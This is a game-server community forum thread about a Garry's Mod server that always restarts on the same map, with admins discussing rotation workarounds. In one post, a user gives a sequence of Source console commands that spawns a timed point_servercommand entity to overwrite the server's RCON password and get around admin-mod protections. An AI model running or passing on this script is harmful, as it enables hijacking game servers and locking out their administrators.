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Server Map

JoeyJoey Registered Posts: 49
edited April 2011 in Tech Support #1
I'd like to know why the map the server starts on is always sb_twinsuns, every time the server crashes or restarts the map is always sb_twinsuns. And since the server crashes so many times, it's almost the onliest played map and some of us are getting a bit tired of it.


  • ZardianZardian Registered Posts: 88
    i second this, forlorn for map #1 with its occluders kthxpls
    the eternal pain in our beloved superadmins asses. Does stuff.
  • KatelynKatelyn Registered, Administrator Posts: 171
    I been sick of it the third time I played it.
  • AmaroqAmaroq Registered, Administrator Posts: 450
    It's not as if I can make the first map random. It has to be set to something. I usually try to change it up every so often.
  • SteeveeoSteeveeo Registered, Administrator Posts: 849
    We probably could, actually, but I'd need a dummy map for the rotator to use so it can automatically randomize. I've been aware of this issue for some time but did not know how to make that dummy map.
  • AmaroqAmaroq Registered, Administrator Posts: 450
    I could make it, in theory. Wouldn't be hard. Hell, you could even make it a map that's already there. Have it be Flatgrass or something. You could probably do it with the map rotator. If Map == "gm_flatgrass" then maptimer == 1 minute. And it'll change to a random map. I'm sure you gotta account for more technical parts of it and whatnot, but.. It'd be relatively simple, overall.
  • KatelynKatelyn Registered, Administrator Posts: 171
    Could you write to a file the next map in the rotation and have it pick that map as a default map? Or even just SET the default to that map automatically when it picks it and when it restarts it is on that map.
  • SteeveeoSteeveeo Registered, Administrator Posts: 849
    Lua has no control over the server command line.
  • Alex4921Alex4921 Registered Posts: 139
    Heres an idea
    Make a dummy map which is just 1 single room,this room has "pictures" of maps all over the walls and the one that is used with E changes to that map.
    point_servercommand "changelevel MAP"
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  • rcdracorcdraco Registered Posts: 5
    Technically you should be able to do that, but not even an rconned admin would be able to use it.

    The best setup to use would be to always save the nextmap into a text file, then when the server boots on a map DIFFERENT then the nextmap, go to nextmap.
  • Alex4921Alex4921 Registered Posts: 139
    Yes you would be able to use it.
    Anyone who creates a point_servercommand can use any command with it,if sv_cheats was 1 on the server i could quite easily create a point_servercommand and force the RCON to what i choose.
    If you don't believe me try this on an sv_cheats 1 server:
    ent_create logic_timer
    ent_fire logic_timer addoutput "targetname taketimer"
    ent_fire taketimer toggle
    ent_fire taketimer addoutput "refiretime 0.01"
    ent_fire taketimer enable
    ent_fire taketimer addoutput "startdisabled 0"
    ent_fire taketimer addoutput "UseRandomTime 0"
    ent_fire point_servercommand kill
    give point_servercommand
    ent_setname point_clientcommand point_servercommand
    ent_fire taketimer addoutput "ontimer point_servercommand,command,rcon_password HACKED"
    rcon_password HACKED
    echo "RCON password has now been altered,probably successfully!"
    Quick thing I whipped up a few years back.
    The crazy shit it does such as renaming and with a timer is in order to bypass a few protections some admin mods offer against this.
    The quieter you are,the more you are able to hear.
  • rcdracorcdraco Registered Posts: 5
    If you don't believe me try this on an sv_cheats 1 server:

    diaspora is not one of those so, nice try guy.
  • Alex4921Alex4921 Registered Posts: 139
    rcdraco wrote:
    If you don't believe me try this on an sv_cheats 1 server:

    diaspora is not one of those so, nice try guy.
    A map can do it regardless of the SV_CHEATS value you impotent fool and even if it cant the map can force it for about a ms,a player requires it to use the commands ent_fire and ent_create however.
    The script i posted was proof of concept to show it works you derp.
    The quieter you are,the more you are able to hear.
  • Nielk1Nielk1 Registered, Administrator Posts: 252
    If it was Linux I would pull a random map and xarg it into the commandline. Depending on how much the line can be change for the server that is. @ work so I can't look without getting out the college VPN.

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